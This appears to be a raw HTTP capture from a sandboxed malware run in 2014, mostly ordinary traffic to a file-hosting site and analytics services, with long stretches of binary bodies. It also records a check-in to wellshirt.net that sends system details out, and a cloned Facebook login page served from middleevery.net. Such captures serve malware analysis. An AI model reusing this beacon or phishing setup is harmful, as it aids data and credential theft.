...........|i..F..w....]@..Q..n..U#..G3.F...&.z.@....,.........H.(......(.yFFDF........_|....V....k..3..:.....b..&..z.&Y..9..0...,c.0.[...<.n...-.w......K.y~c.....8o..7......%3.k.#..y..M3..'.|..E..a.;.lS./..z?.p/o..$O...7..S..IM.E.4...%..%....}.....l.,..=;.;TuN.....a.=.......|..-.u..%..J..vw...[..}y...U.M.cC<.N.~....W...,...(IRG<.a.c..Z...K&......( .....BO.IF.Ln.:..A.......P.2Mar.E.....A.5#.....)..39.......9........c.$.]H...(.b..X...X<...A....#.d^@...,L........F9O.......9&.&.70...3h y.\.Z.9.h..Is...d.^.krfq|...9Y...4!s...a..c.L.Bl..*CP..^.U..J...ba.^8pCwL.Z.........~fuY2..T...../M.....K.c.........J..-..vH...]...N.......$.#.n..B.F...I..il\.!0bY.Z...9..{50......\P0]....:.*F...d.}.......fwP.....Q...F:.1..H....F..bL.... Ix.......\.."...u..N..e.....m@.....:.Fa....bM7h4...2w...x:...M@.E..._x.J-. ..(.....m ..8.-f.M..... .\i....ky.4.dLM............ F.X.~..H.@.9...I.%..d 5.....)v...c..i...(.~........G.2d6.7.C.Z.0.`. .0.Yd-Y..v.g....c8.r.H........7.....O({.......,..8Y..@...z..X........<!..x4j..........e.k.._........3...Y....E.b...X.E.[Cn..... .H.C!.@.G.-.=...S V..."%...6.......?p<.Y.!.....&....s.&..vbr..w...9......rds..o.!.f.y.....d.........n.......Xs....Z.R.j....A.%..~.....?..'.0>..C.......hp..x.]..9.b...U..n..Ig"....P9.......=....r.0{....F.:......@o....."...........1..&q.@...:..P......E.....pa.....O...........~...h....!O...J......S......Z......_........x.......W..>..../...^C|....../O........e.G.w4."...Zc.o0Y._..q............/L........A.}....\<.......G.q...xL..&.jX.....w.....k..^.....&hA...0J}
<<
<<< skipped >>>
GET /forum/search.php?method=setvar&key=cpuinfo&value=Intel(R) Xeon(R) CPU E7340 @ 2.40GHz (2393 MHz)&mode=sox&v=028&sox=3b528200&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0
Accept: */*
Connection: close
Host: wellshirt.net
HTTP/1.0 200 OK
Date: Fri, 30 May 2014 15:55:38 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 0
Server: YTS/1.20.28
.............
GET /en_US/all.js HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9
Accept: */*
Referer: hXXp://VVV.fileswap.com/
Connection: Keep-Alive
Accept-Encoding: gzip
Accept-Language: en-US,*
Host: connect.facebook.net
HTTP/1.1 200 OK
ETag: "fd8c6a9f92c55c011adcbc409e00026e"
Content-Type: application/x-javascript; charset=utf-8
Timing-Allow-Origin: *
Content-Encoding: gzip
Content-MD5: YDYtMDo5BiGKdWAidVv7Nw==
X-FB-Debug: liwqYrYBPa75LLtIadkW1ZABvIl7wQurY1yoMd3OU6I=
Content-Length: 53567
Cache-Control: public, max-age=1200
Expires: Fri, 30 May 2014 16:16:12 GMT
Date: Fri, 30 May 2014 15:56:12 GMT
Connection: keep-alive
Vary: Accept-Encoding
............k{.H.7...O.=3.jd..:B.|.q.v..[U=.3..%@.q.F`......_Df*%............cddddddD..O..j...<>z..;|.......c.??|/..'.|....xR/]..=y.....'._..t...q..O.Q...M...............I.JY..%...$....n8 ..a..4............tT..F.>...............HJ'..|x....w.R..?..eiu.M..U....z]*./&.tY....?..Y).G.%.$.^..w..p27IU..P....q./..i.....y8..F..:....`....*E6[.$7.L.....[-*Rk..._).O...z.4.[......Z4...7....,./f.R...5n.T.0.......h.z.V..b.."...n.....M.7......U'.z......&...,..8..F(.^O..<q...@.S...............,..............Td.]P.u.u..b4j.....4..J.f.xVv>2.%..V...P...R;.'.nx.M...6n1.........v.i.E~.:.'.y..xC.y.8..Pr.....QcT....*.w..~st..:AB]....~......!.............d.5.)C}.e........alI>!"X..i.j'...(.......t......U...<.-i.NG.r....f.....4.........<...4........w...W..z......N<..s.sO.\_...<.........q8.......[........w.}{.j6..DV....z.3/].^..x].)U..Va.:...p.^d...c.%....-T....Y..Mf#....2...6 R...6*..K..J.......3"P.h.!...Peh....@.v......C....!Q.G#bL.........5$..m.j%.............!!.V.q.0...l.............M.@..[.C^......8v...Z4....&v....Y.=7d..xl...7@o.......i...?....@..nDk....^.......F.b....H.....ytF ..;.t....m......um......\.m..5.....^.;....x.`7)..$......z<A........S.f5..#..f=.L......_.....)fK{....i.u.ww.d:.....7....Vw*..N_.....:...@.V....,....J.. .....M.J..7W........3%.E..y. ....B...&.5K...V-..1lT...#.Y.....&.5....=.....<.h..Es...8"_.U....?m..Q.J4.......O.q;....<<s..D.O.'..].e.....y.:.&e.......z.j. ....F.w...>......?........&...9z0..).F..V.f..X..K.......a....q.......:Q.....p7a.."...$.`Q?.(.........!.;.c.g....
<<
<<< skipped >>>
GET /ga.js HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9
Accept: */*
Referer: hXXp://VVV.fileswap.com/
Connection: Keep-Alive
Accept-Encoding: gzip
Accept-Language: en-US,*
Host: VVV.google-analytics.com
HTTP/1.1 200 OK
Date: Fri, 30 May 2014 13:06:01 GMT
Expires: Sat, 31 May 2014 01:06:01 GMT
Last-Modified: Thu, 08 May 2014 18:54:47 GMT
X-Content-Type-Options: nosniff
Content-Type: text/javascript
Vary: Accept-Encoding
Content-Encoding: gzip
Server: Golfe2
Content-Length: 15790
Age: 10211
Cache-Control: public, max-age=43200
Alternate-Protocol: 80:quic
...........}kw.:............Io@R..........l.,.iH.....$...3#......s.z7..<..e4....x2.Y/.....>^.<.C.D......j...0c!...qo.....A*....L&..x.K..w.*8..%.<..|..)d.X.......&..*... .Q...(.....8..q..\.!...a..0...$.tX..N&..a?!..zB:l.8c9.p.....;l..x.$c.]AP\..>..B...&..:pz.H........g...Ap..!.5..K......V;l.H.....V.a.....s.$p......39...a.a.P'9.b.;H>N.$..A..... ..^..{h.h...2l_..N...w9..d.@.`._.N..7..|....%.d.%......%.{.....&.@.I..:....F.{..c.nzP*..a..LzP.sl...V..y.U8*&.......}.BH@..ZC...Ty. u.Y...!..R.h.V..h./>3...*.P..(..:A.}..v.C ..M..Vk.......\..d....he.q..u.u..yE./J.Re..|:u..L...B..E..Tn/v \.<...8..MU.g.....{.`..}.;n.....x................4...kG..[q....0r7.....l.n?..@|.%W.g....V..../.a......P`....t W.VNq.#.......}.WL....,X.a....{..*..!<W.......e.{.$.e......[......S....(.).K..........>....X5o{i&.X..A.F.T"h.....KB...^]..f..z3.jyYcy......@..#Y*.z.Jl.#w...S...^..a..A..F....q.!...6~...1....P.......`..= .M.(.^.@.5.L...y..P.".v.........L...R.....[...fx....o...K...s..!..........oa.F..V......)..ym...;......a..r..N. ....Y.5o.u|..K...}l[i.....N.-%...4.I..(..'.....PR..gnAx...A.D.....w..5W..m. .....Zno........d<hpf...s.e#..v...p..g...[.G.k.2.c.6.....5..Lcc.fUm/.P!....!U.c.......d78!7.......V>&."..Q$.....&.sS..Kq....].UySz=..3..$.".;..".'.Kar\[...t\....;...h._.O..b...2....{=H9@...v0l)2!..xD7...T..Di.w.RC`.m.8.\....J....h..u{{.....p..)..O3.W.........k...y.`^ ....&1..f"..D.W.}.;D:d.F....p#... ......d...T..iU7n.;-hh..T..^P....U.....>...T..m....fC....>..>d..Q..!....X1......7L...[.........;.w...[L.LB.
<<
<<< skipped >>>
GET /__utm.gif?utmwv=5.5.1&utms=1&utmn=811700353&utmhn=VVV.fileswap.com&utmcs=UTF-8&utmsr=1024x768&utmvp=1243x779&utmsc=32-bit&utmul=en-us&utmje=0&utmfl=-&utmdt=FileSwap.com : Upload Files, Free File Hosting, Cloud Storage&utmhid=2142558865&utmr=-&utmp=/&utmht=1401447789769&utmac=UA-1366737-9&utmcc=__utma=182058928.686437553.1401447790.1401447790.1401447790.1;+__utmz=182058928.1401447790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);&utmu=q~ HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9
Referer: hXXp://VVV.fileswap.com/
Accept: */*
Connection: Keep-Alive
Accept-Encoding: gzip
Accept-Language: en-US,*
Host: VVV.google-analytics.com
HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 19 Apr 2000 11:43:00 GMT
Last-Modified: Wed, 21 Jan 2004 19:51:30 GMT
X-Content-Type-Options: nosniff
Content-Type: image/gif
Date: Thu, 29 May 2014 01:06:01 GMT
Server: Golfe2
Content-Length: 35
Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Age: 139811
Alternate-Protocol: 80:quic
GIF89a.............,...........D..;..
GET /fb_login/index_files/QzuAG9bQwbS.css?session=3b528200 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9
Accept: text/css,*/*;q=0.1
Referer: hXXp://middleevery.net/fb_login/
Connection: close
Accept-Language: en-US,*
Host: middleevery.net
HTTP/1.1 200 OK
Date: Fri, 30 May 2014 15:56:13 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Tue, 02 Apr 2013 04:17:13 GMT
Accept-Ranges: bytes
Content-Length: 280389
Content-Type: text/css
Age: 0
Connection: close
Server: YTS/1.20.28
/*1364593181,173213727*/...fbEmuTracking{position:absolute;visibility:hidden}..tinyViewport div._22r, div._22r{position:fixed !important;right:-300px !important;width:244px}..tinyViewport ._22q div._22r, ._22q div._22r{width:122px}.div._22q #pagelet_rhc_footer{display:none}.div._22q .ego_column, div._22q{width:122px;z-index:1}.div._22q .image_body_block{padding-top:0}.div._22q .fbEmuImage{float:none}.div._22t .uiSideHeader{background:none;border-bottom:1px solid #c8d1e2;border-top:0;padding:4px;margin-bottom:0}.div._22t .ego_unit{margin-bottom:7px;padding-top:3px;border-color:#c8d1e2}.div._22t div.ego_section > div{padding-left:0;padding-right:0}.._22t .uiSideHeader h4{color:gray;font-weight:normal}.._22q a.uiHeaderActions{display:none}.._22s{bottom:auto;top:50px}..timelineLayout ._22t{bottom:15px;padding-top:12px}..pagesTimelineLayout ._22t{padding-top:51px}.._3nl ._22t{padding-top:0;width:315px}.._3ms_ ._22t{padding-top:0}..permalinkBody ._22t .uiBlingBox{border-bottom:none}.button.async_saving .default_message,.a.async_saving .default_message,.form.async_saving .default_message,..saving_message{display:none}..default_message,.button.async_saving .saving_message,.a.async_saving .saving_message,.form.async_saving .saving_message{display:inline}..async_throbber .async_saving{background:url(hXXps://fbstatic-a.akamaihd.net/rsrc.php/v2/yb/r/GsNJNwuI-UM.gif) no-repeat right;padding-right:20px}..async_throbber_left .async_saving{background:url(https://fbstatic-a.akamaihd.net/rsrc.php/v2/yb/r/GsNJNwuI-UM.gif) no-r
<<
<<< skipped >>>
GET /_js/global.js?ver=d10 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9
Accept: */*
Referer: hXXp://VVV.fileswap.com/
Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/
Connection: Keep-Alive
Accept-Encoding: gzip
Accept-Language: en-US,*
Host: VVV.fileswap.com
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 30 May 2014 15:56:11 GMT
Content-Type: application/javascript; charset=utf-8
Content-Length: 66902
Last-Modified: Mon, 03 Feb 2014 21:56:14 GMT
Connection: keep-alive
ETag: "52f0107e-10556"
Expires: Sat, 31 May 2014 15:56:11 GMT
Cache-Control: max-age=86400
X-Frame-Options: DENY
Accept-Ranges: bytes
var globalMouseX;.var globalMouseY;.$(document).ready(..function()..{...if ((navigator.platform.indexOf("iPhone") != -1) || (navigator.platform.indexOf("iPod") != -1))...{....$("input:file").parent().append("Upload is not supported by your device!");....$("input:file").hide();....$(".upbutton").hide();...}...makeDraggables();...$('.gbutton').click(function(event)...{....event.stopPropagation();...});...$('#tools_menu').click(function(event)...{....event.stopPropagation();...});....window.page=2;...$(window).scroll(function()...{....if($(window).scrollTop() 200 >= $(document).height() - $(window).height())....{.....nextPage(false);....}....if($(window).scrollTop()>=195)....{.....$("#home_member_filesmenu").css({position:'fixed', top:0});.....$("#home_member_filesmenu_ph").css('height', $("#home_member_filesmenu").css('height'));....}....else....{.....$("#home_member_filesmenu").css({position:'relative', top:''});.....$("#home_member_filesmenu_ph").css('height', '0px');....}...});....$("body").mousemove(....function(e)....{.....globalMouseX = e.pageX;.....globalMouseY = e.pageY;....}...);...//GT CLIENT PAGE...$('.collapsible').children().hide();...$('.collapsible').click(....function(e)....{.....if ($(this).children().css('display') == 'block').....{......$(this).children().hide();......$(this).css('background-image', 'url(/_images/ico_expand.png)');.....}.....else.....{......$(this).children().show();......$(this).css('background-image', 'url(/_images/ico_collapse.png)');.....}....}...);...$('#home_membe
<<
<<< skipped >>>
GET /_images/ajax-loader.gif HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9
Referer: hXXp://VVV.fileswap.com/
Accept: */*
Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/
Connection: Keep-Alive
Accept-Encoding: gzip
Accept-Language: en-US,*
Host: VVV.fileswap.com
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 30 May 2014 15:56:12 GMT
Content-Type: image/gif
Content-Length: 673
Last-Modified: Mon, 10 Sep 2012 19:24:59 GMT
Connection: keep-alive
ETag: "504e3e8b-2a1"
Expires: Sat, 31 May 2014 15:56:12 GMT
Cache-Control: max-age=86400
X-Frame-Options: DENY
Accept-Ranges: bytes
GIF89a................BBB...bbb......!..Created with ajaxload.info.!.......!..NETSCAPE2.0.....,..........3....0.Ik.c.:....N.f.E.1.......`..q.-[.9...9...Jk.H..!.......,..........4....N.! .......DqBQT`1. `LE[..|..u..a... ....C..%$*..!.......,..........6..2# .A....V/..c....N.IBa..p......... .Y.......2.d.....!.......,..........3..b% .2....V_.....!..1D.a...F.....bR].=.08,....r9L..!.......,..........2..r' J.d....L..&v.`\bT.....hYB)..@....<..&,....R...!.......,..........3.. ..9..t....0....!.B...W..1....sa..5....0.....m)J..!.......,..........2.........U]....qp.`..a..4..AF.0..`......@..1.......!.......,..........2....0.I.eB..)..... ..q..10....P..a..V... ub...[....;.............
GET /_images/header_sync.png HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9
Referer: hXXp://VVV.fileswap.com/
Accept: */*
Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/
Connection: Keep-Alive
Accept-Encoding: gzip
Accept-Language: en-US,*
Host: VVV.fileswap.com
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 30 May 2014 15:56:12 GMT
Content-Type: image/png
Content-Length: 1395
Last-Modified: Mon, 10 Sep 2012 19:24:59 GMT
Connection: keep-alive
ETag: "504e3e8b-573"
Expires: Sat, 31 May 2014 15:56:12 GMT
Cache-Control: max-age=86400
X-Frame-Options: DENY
Accept-Ranges: bytes
.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..WMLcU.>..............%......d.GL&C....A.1&.........DW.b......G...I.F.J.v(.8.Bi..2...{.{)."..&..$.........|..[F.E8Ma.......S. !?..-......CL3.....z .6.....~{.......PWT.B&...%m.....J?.IX]...."......*.j=.. :.69A..@....{....}.e.......u56.\...A>..t:}u9......$..z...Pt.<j..6......Z.Z...D.,.. ...f.W....O...]F...........k2...N6.</Z.&..CJD*...e2.U..8>6...w..|...<.@Y.Z....b5.\J....EKZ.BA...~.......<.#O..@..B..9....1......o.......p..3.|O...P.)(....y..y.>S.h_..W......=...!...N...............@. =...v........^...L.....555.mmm4...hv.[L5.-.s..o.........0..uwuM.y5....:O$.............*q.....b.....twwS......1.x.G7..A4.{......[..&.CNB.. ....Xl..N'.V. . ?,...p..;..r.t...9...K.S.....o.g..T8..06<|.n1:Xt\`2..P.3.G.S......oQ..\..v?r,..B..Ws.P......E.#....n.79d.n...;Y../.......T.......q..........T*....B...z.|..Mp..#J...!..-).E.(......!..*.%S)..0%....0..88....i.`.....s.Q..F......q.....<;<...-.DB....p..F#D#.8..HA>...1V*c!...u...%....8.L."...y..A..z...C2..[1........W...`.Y..8Ga.l.&.0..&..G*5..........; B.),.t..=.E..!.F....t...^|v.jx..ggKl..$.)...h<....b%............hd.j.....%......%..Y...d..o.........E*.J...G......D......"@r-....z..f$.."'.....x.u_....].t.D..4....b.2.L......l.........y<.....Mx...r/..z....B~.[7.f..l.....?.s.$...VVV.VWW.H.#V9..,..._D....]UU.1.. x.D.SI.d..3.P..j.kh"...Pn..KLz......Z~...........HQ..B....IEND.B`...
<<
<<< skipped >>>
GET /fb_login/index_files/tjP47PMhke1.js?session=3b528200 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9
Accept: */*
Referer: hXXp://middleevery.net/fb_login/
Connection: close
Accept-Language: en-US,*
Host: middleevery.net
HTTP/1.1 200 OK
Date: Fri, 30 May 2014 15:56:13 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Tue, 02 Apr 2013 04:17:13 GMT
Accept-Ranges: bytes
Content-Length: 20579
Content-Type: application/x-javascript
Age: 0
Connection: close
Server: YTS/1.20.28
/*1364175991,173217823*/..if (self.CavalryLogger) { CavalryLogger.start_js(["fKd4 "]); }..__d("NotificationURI",["URI"],function(a,b,c,d,e,f){var g=b('URI'),h={localize:function(i){i=g(i);if(!i.isFacebookURI())return i.toString();var j=i.getSubdomain();return i.getUnqualifiedURI().getQualifiedURI().setSubdomain(j).toString();},snowliftable:function(i){if(!i)return false;i=g(i);return i.isFacebookURI()&&i.getQueryData().hasOwnProperty('fbid');}};e.exports=h;});.__d("DoublyLinkedListMap",["copyProperties"],function(a,b,c,d,e,f){var g=b('copyProperties');function h(){this._head=null;this._tail=null;this._nodes={};this._nodeCount=0;}g(h.prototype,{get:function(i){return this._nodes[i]?this._nodes[i].data:null;},_insert:function(i,j,k,l){k&&!this._nodes[k]&&(k=null);var m=(k&&this._nodes[k])||(l?this._head:this._tail),n={data:j,key:i,next:null,prev:null};if(m){this.remove(i);if(l){n.prev=m.prev;m.prev&&(m.prev.next=n);m.prev=n;n.next=m;}else{n.next=m.next;m.next&&(m.next.prev=n);m.next=n;n.prev=m;}}n.prev===null&&(this._head=n);n.next===null&&(this._tail=n);this._nodes[i]=n;this._nodeCount ;return this;},insertBefore:function(i,j,k){return this._insert(i,j,k,true);},insertAfter:function(i,j,k){return this._insert(i,j,k,false);},prepend:function(i,j){return this.insertBefore(i,j,this._head&&this._head.key);},append:function(i,j){return this.insertAfter(i,j,this._tail&&this._tail.key);},remove:function(i){var j=this._nodes[i];if(j){var k=j.next,l=j.prev;k&&(k.prev=l);l&&(l.next=k);this._head===j&&(this._head=k);this.
<<
<<< skipped >>>
GET /fb_login/index_files/GsNJNwuI-UM.gif?session=3b528200 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9
Referer: hXXp://middleevery.net/fb_login/
Accept: */*
Connection: close
Accept-Language: en-US,*
Host: middleevery.net
HTTP/1.1 200 OK
Date: Fri, 30 May 2014 15:56:13 GMT
P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: max-age=864000
Expires: Mon, 09 Jun 2014 15:56:13 GMT
Last-Modified: Tue, 02 Apr 2013 04:17:13 GMT
Accept-Ranges: bytes
Content-Length: 522
Content-Type: image/gif
Age: 0
Connection: close
Server: YTS/1.20.28
GIF89a.............p....................Ro...................!..NETSCAPE2.0.....!.......,.......... ..I....e....)."-...%..g..i..tio..~..0.......!.......,...........P.$........wIT..!.......,..........2..)R.s.s.L..d.A......."..)...Y.lF.......y.M.(.U....!.......,..........>..I.HIT...R. .P..t....I1.....H.....Y....`.a....}L....&6..u..d".!.......,..........=..I....`.2.P..t...(."..P.....,..........w........OhTJ.........!.......,..........3..I....e...P...(.d.R1...2r...\3...=.....>..24.`..J..!.......,.............%.......T..;..
GET /ads/user-lists/1072568869/?label=nJZCCOiW1wEQpbS4_wM&fmt=3&bg=ffffff&num=1&ct_cookie_present=false&cv=7&frm=0&url=http://VVV.fileswap.com/&random=2372120351&ipr=y HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9
Referer: hXXp://VVV.fileswap.com/
Accept: */*
Connection: Keep-Alive
Accept-Encoding: gzip
Accept-Language: en-US,*
Host: VVV.google.ca
HTTP/1.1 200 OK
Content-Type: image/gif
Date: Fri, 30 May 2014 15:56:13 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate
X-Content-Type-Options: nosniff
Server: adclick_server
Content-Length: 42
X-XSS-Protection: 1; mode=block
Alternate-Protocol: 80:quic
GIF89a.............!.......,...........D.;..
GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Connection: Keep-Alive
Accept-Encoding: gzip
Accept-Language: en-US,*
Host: VVV.fileswap.com
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 30 May 2014 15:56:11 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; path=/
Expires: Fri, 30 May 2014 15:56:10 GMT
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: landing_url=/; expires=Sun, 29-Jun-2014 15:56:11 GMT
Content-Encoding: gzip
Vary: Accept-Encoding
X-Frame-Options: DENY
1208.............;is....._.sfG..$J>.X.4k.r.}..c..K.X .Q.).....M..v. EJ.egv.6U.(.......p..jp.?.C2N&~..!~.....=c.$a.4..ik....gv....'.1.o6......q8a.%..d....g.D.. i..Bf.G}...{JL.~@.1.b....N...bJ<.O|.?.>.............%8.7.i..|&.E...k../R..&"..;4..D....$......A"...8...1c.A.............-x.....kH.`....g>"~B.....\|.D<L....G.F..GN.@..5..-O..g.p........E1......m....y6|.....CS.BR..Y....f...........e...e..// lZ_c...).fK.^7.....p4...w.....6..`.,........b...y..)}@..i,......0.!..Y..^7....:).x.{..TL..p...B.......%.c..d ..j.#.K...n.cg{.o.........w...M...m...w{.>........nFB$.|.....)BlLy..`.>.g.s.....(...,... ..?...-.o....p~.B..-p\k.......@...AL.........$.P..S....Y.&!..............!....@L.yz|q. .M....#.....i...o.......rv.-g.."o.....Y...Z..xPk.e..8.A..,.06.(.o.........;>a"M..../...[..!3.....ik..y=...zz4.._].c...s=.......8.Q.. .s....syr.".E....z...iD... .t.l(.C...zM.TM....9.<j#....b......G..?I.4....$...V...........]S.r<.K4...3.^.~P.j..B.......^b}K>.C.~.Y:.1...y0!.`.....C...6..p@B.....R;.~.....Q.m.......v.t@..M...]|.3......6~.......{...x.H..).E7..z.;0$P'..4.E.`....^mR......Oc({dP.(..vg..*.n ../.#.Uc.S,.n.P....,....b......9.g>....y.a..Mx:)...^...p.".#g."...CH..<...c.S..J...#.M.f..!.O...q..<.8K1.....1..V8....},........C.d.4..6c...J31....~.l....vdf.<..b.6.JR..*{)...5.e}.ip.Y..Y..A.S../c .. ...x..,.q1.e..A..#"x`3.. l..L.8..@e..uv...C..c..r.V....9c.<..)c...Ml.......P........k.DT.........^......w...........8.....Hrs.p. .\#w@.,:.f..... ......9I...Gx..B.$s.............?..$.._. Q....M.........f.[
<<
<<< skipped >>>
GET /_css/global.css?v=54 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9
Accept: text/css,*/*;q=0.1
Referer: hXXp://VVV.fileswap.com/
Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/
Connection: Keep-Alive
Accept-Encoding: gzip
Accept-Language: en-US,*
Host: VVV.fileswap.com
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 30 May 2014 15:56:11 GMT
Content-Type: text/css
Last-Modified: Thu, 12 Dec 2013 18:00:10 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Expires: Sat, 31 May 2014 15:56:11 GMT
Cache-Control: max-age=86400
X-Frame-Options: DENY
Content-Encoding: gzip
1d53.............=ko.F..._A..4Im.oQ6......&M.....X....o)Q..8i..~.......Y\.Qe.s.....3gfV.....ggUT....s.'..:mo.....x.l.<.6.../G.&.D.X_...i..=..p.f......s/....e...O..m..'.t.;..mU^..,................~.No....~.b.~.^.M...by{...>.h..'.Y]m~[..Ou........^.L.......E..iW5..M..Uew....m.........C.J..-......_......k..y....1pP....>M..vs........f{..O.i[.}w.\W..O.{...k6.^z..b4N.v.t#.BU..n[.....@.8].M...1..o../...w...sB..*...so....@.;.%.\8u.u...4......... .@ vM]...,...C.....%.d~$Dl........91z..;.q.w.o...H.s..ST.G.^...bw.O.eb.C..v1t.}"w"..u¢.e.~.__%....#.....;]6..5../#..1......>g@F...n.n..E.Q.?..u &..c....O.$.9y..C\.....cH.P.....N.Q.......#..h.}....p...o.._....!.....B.@h .K|..].w....3.^L..X.0.`....u.}.w...<&..M...?..raO)...}.t ?.....8..C..@:< .&..!]..:...~4.Xy..p.....R.....3B.....h.......:..(.f..../\...R..$.I .....!...........)iq.>&.x.>F.7`.`....Cu..bn.#..$. !.\^^R.......z".#....[....H.i^..]..^..e].Ok.-.O.G.\.@.,).rz!..N.......z....Bv...N.....Z..?b"Iz.....z.0P..:..{.E..q..\",...-...o....sc)u..V........b..A..<.............].....r2....A..3......&....).$G6.GIt3(._....m..)..5.of.eH3.*...7.=K..d.../.<.`..p~...............G......d......i.B..._......n4..p..u. 8P........k.....T_..G.?/.v.ay.......=.O.H.Z....m..Q..2...>.....i .4..|.6..Y....E......I....J.A.$.........C!..d.b..M[.5..#...:..4....5.}.`.#<.q.l\.>........J..'.".oAr..g.....ms.u:`..................*.[..g.............7]U...m...{...,.r._0o..i...N`.E..?.0....W1..#...b..).Z....$>.P......q.O&{........j...)...~..i......A..uM^.E..~.......A!.....
<<
<<< skipped >>>
GET /ext/swfupload/swfupload.js HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9
Accept: */*
Referer: hXXp://VVV.fileswap.com/
Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/
Connection: Keep-Alive
Accept-Encoding: gzip
Accept-Language: en-US,*
Host: VVV.fileswap.com
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 30 May 2014 15:56:11 GMT
Content-Type: application/javascript; charset=utf-8
Content-Length: 37706
Last-Modified: Mon, 10 Sep 2012 19:25:00 GMT
Connection: keep-alive
ETag: "504e3e8c-934a"
Expires: Sat, 31 May 2014 15:56:11 GMT
Cache-Control: max-age=86400
X-Frame-Options: DENY
Accept-Ranges: bytes
